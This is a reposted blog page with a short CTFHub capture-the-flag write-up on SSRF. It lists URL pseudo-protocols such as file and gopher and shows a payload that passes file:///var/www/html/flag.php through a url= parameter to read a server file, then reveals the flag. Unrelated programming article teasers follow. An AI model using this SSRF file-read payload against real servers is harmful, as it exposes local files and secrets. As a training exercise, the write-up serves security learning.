CTFHub-SSRF-读取伪协议

CTFHub-SSRF-读取伪协议

news/2024/11/18 4:39:37/文章来源:https://blog.csdn.net/ssss39/article/details/134005251

WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点-CSDN博客

伪协议有：

file:/// — 访问本地文件系统

http:/// — 访问 HTTP(s) 网址

ftp:/// — 访问 FTP(s) URLs

php:/// — 访问各个输入/输出流(I/O streams)

dict:///

sftp:///

ldap:///

tftp:///

gopher:///

根据提示挨个尝试用伪协议读取文件：

file:///var/www//html//flag.php

http://challenge-4b3f050a714db9d5.sandbox.ctfhub.com:10800/?url=file:///var/www//html//flag.php

F12

ctfhub{e5dda48e5ba656f0f6a43d18}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/169757.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

电影评分数据分析案例-Spark SQL

电影评分数据分析案例-Spark SQL

# cording:utf8from pyspark.sql import SparkSession from pyspark.sql.types import IntegerType, StringType, StructType import pyspark.sql.functions as Fif __name__ __main__:# 0.构建执行环境入口对象SparkSessionspark SparkSession.builder.\appName(movie_demo)…

阅读更多...

动态开辟内存空间函数

动态开辟内存空间函数

文章目录 malloc函数calloc函数malloc函数和calloc函数的不同free函数realloc函数 malloc函数参数是要开辟内存空间的大小开辟成功则返回值为开辟空间的首地址，若开辟失败则返回一个空指针NULL calloc函数第一个参数为开辟空间的元素个数，第二个参数…

阅读更多...

springboot maven项目环境搭建idea

springboot maven项目环境搭建idea

springboot maven项目环境搭建idea 文章目录 springboot maven项目环境搭建idea用到的软件idea下载和安装java下载和安装maven下载和安装安装maven添加JAVA_HOME路径，增加JRE环境修改conf/settings.xml，请参考以下项目idea配置打开现有项目run或build打…

阅读更多...

雷电模拟器端口号 adb连接

雷电模拟器端口号 adb连接

在尝试adb连接雷电模拟器时，网上查询了一下端口号，发现说是5555. 但是自己尝试，会提示： cannot connect to 127.0.0.1:5555: 由于目标计算机积极拒绝，无法连接。 (10061) 终于发现，因为我打开的模拟器&am…

阅读更多...

Vue3 + TypeScript

Vue3 + TypeScript

Vue3 TS开发环境创建 1. 创建环境 vite除了支持基础阶段的纯TS环境之外，还支持 Vue TS开发环境的快速创建, 命令如下： $ npm create vitelatest vue-ts-pro -- --template vue-ts 说明： npm create vitelatest 基于最新版本的vite进行…

阅读更多...

【Maven】VSCode Java+Maven 环境配置

【Maven】VSCode Java+Maven 环境配置

0x00 前言没写过 Java，得配个带 Maven 的编码环境，不太明白，试试看顺便记录一下 0x01 配置过程安装 jdk1.8 后，找到安装位置： (base) dianCD-Ali doraemon % /usr/libexec/java_home -V Matching Java Virtual Ma…

阅读更多...

SpringBoot项目中使用MybatisPlus

SpringBoot项目中使用MybatisPlus

MybatisPlus的优点使用时注意事项: 首先需要在spring boot启动类中添加MapperScan注解，扫描Mapper文件夹。并且在POM文件引入坐标的时候不要同时引入Mybatis和Mybatis-Plus的坐标。容易出现版本差异不兼容。日志配置由于SQL的执行是不可见的，所以…

阅读更多...

React-Redux总结含购物车案例

React-Redux总结含购物车案例

React-Redux总结含购物车案例 reduc简介 redux是react全家桶的一员，它为react给i共可预测化的状态管理机制。redux是将整个应用状态存储到一个地方，成为store,里面存放着一颗树状态(state,tree),组件可以派发dispatch行为action给store,而不是直接通知其…

阅读更多...

Java实现ORM第一个api-FindAll

Java实现ORM第一个api-FindAll

经过几天的业余开发，今天终于到ORM对业务api本身的实现了，首先实现第一个查询的api 老的C#定义如下因为Java的泛型不纯，所以无法用只带泛型的方式实现api，对查询类的api做了调整，第一个参数要求传入实体对象首先…

阅读更多...

python中可变类型与不可变类型详细介绍

python中可变类型与不可变类型详细介绍

嗨喽，大家好呀~这里是爱看美女的茜茜呐一.可变类型与不可变类型的特点 1.不可变数据类型不可变数据类型在第一次声明赋值声明的时候, 会在内存中开辟一块空间, 用来存放这个变量被赋的值, 而这个变量实际上存储的, 并不是被赋予的这个值, 而是存放这个值所在空…

阅读更多...

回归预测 | MATLAB实现BO-GRU贝叶斯优化门控循环单元多输入单输出回归预测

回归预测 | MATLAB实现BO-GRU贝叶斯优化门控循环单元多输入单输出回归预测

回归预测 | MATLAB实现BO-GRU贝叶斯优化门控循环单元多输入单输出回归预测目录回归预测 | MATLAB实现BO-GRU贝叶斯优化门控循环单元多输入单输出回归预测效果一览基本介绍模型搭建程序设计参考资料效果一览基本介绍 MATLAB实现BO-GRU贝叶斯优化门控循环单元回归预测。基于贝…

阅读更多...

字节码进阶之JVM Attach API详解

字节码进阶之JVM Attach API详解

字节码进阶之JVM Attach API详解文章目录字节码进阶之JVM Attach API详解附加到虚拟机加载代理和获取信息分离虚拟机使用Attach API的基本步骤1. **获取虚拟机实例**：2. **附加到虚拟机**：3. **加载代理或获取信息**4. **从虚拟机分离**：…

阅读更多...

C语言-面试题实现有序序列合并

C语言-面试题实现有序序列合并

要求： a.输入两个升序排列的序列，将两个序列合并为一个有序序列并输出。数据范围： 1≤n,m≤1000 1≤n,m≤1000 ， 序列中的值满足 0≤val≤30000 输入描述： 1.输入包含三行， 2.第一行包含两个正整数n, m&am…

阅读更多...

python网络爬虫（二）基本库的使用urllib/requests

python网络爬虫（二）基本库的使用urllib/requests

使用urllib 了解一下 urllib 库，它是 Python 内置的 HTTP 请求库，也就是说不需要额外安装即可使用。它包含如下 4 个模块。 request：它是最基本的 HTTP 请求模块，可以用来模拟发送请求。就像在浏览器里输入网址然后回车一样&…

阅读更多...

html web前端，登录，post请求提交 json带参

html web前端，登录，post请求提交 json带参

html web前端，登录，post请求提交 json带参 3ca9855b3fd279fa17d46f01dc652030.jpg <!DOCTYPE html> <html><head><meta http-equiv"Content-Type" content"text/html; charsetutf-8" /><title></t…

阅读更多...

rust学习——方法 Method

rust学习——方法 Method

文章目录方法 Method定义方法self、&self 和 &mut self方法名跟结构体字段名相同带有多个参数的方法关联函数多个 impl 定义为枚举实现方法 rust 结构体与枚举的区别回答1回答2 方法 Method 从面向对象语言过来的同学对于方法肯定不陌生，class 里面就充斥…

阅读更多...

Python-----for循环基本语法及其应用---对序列进行遍历循环

Python-----for循环基本语法及其应用---对序列进行遍历循环

for循环基本语法 for循环结构主要用于（序列 ：包括字符串、列表、元组、集合以及字典）类型数据的遍历（循环）操作。遍历(Traversal)，是指沿着某条搜索路线，依次对树（或图&#…

阅读更多...

nodejs+wasm+rust debug及性能分析

nodejs+wasm+rust debug及性能分析

文章目录背景v8引擎自带的profilelinux的perf采集wasm三方库性能分析编译debug版本wasmrust程序debug调试异常模型正常模型结论优化参考 Node使用火焰图优化CPU爆涨 - 掘金【Node.js丨主题周】理解perf 与火焰图-腾讯云开发者社区-腾讯云 Easy profiling for Node.js Applic…

阅读更多...

RK3568平台开发系列讲解（应用篇）串口应用编程之串口的使用步骤

RK3568平台开发系列讲解（应用篇）串口应用编程之串口的使用步骤

🚀返回专栏总目录文章目录一、配置参数1.1、获取当前串口的配置参数1.2、修改和写入串口的配置参数二、模式2.1、输入模式2.2、输出模式2.3、控制模式2.4、本地模式2.5、特殊控制字符沉淀、分享、成长，让自己和他人都能有所收获！😄 📢 串口设备是嵌入式开发中最常用的…

阅读更多...

Node.js在Python中的应用实例解析

Node.js在Python中的应用实例解析

随着互联网的发展，数据爬取成为了获取信息的重要手段。本文将以豆瓣网为案例，通过技术问答的方式，介绍如何使用Node.js在Python中实现数据爬取，并提供详细的实现代码过程。 Node.js是一个基于Chrome V8引擎的JavaScript运行时环境…

阅读更多...

最新文章

推荐文章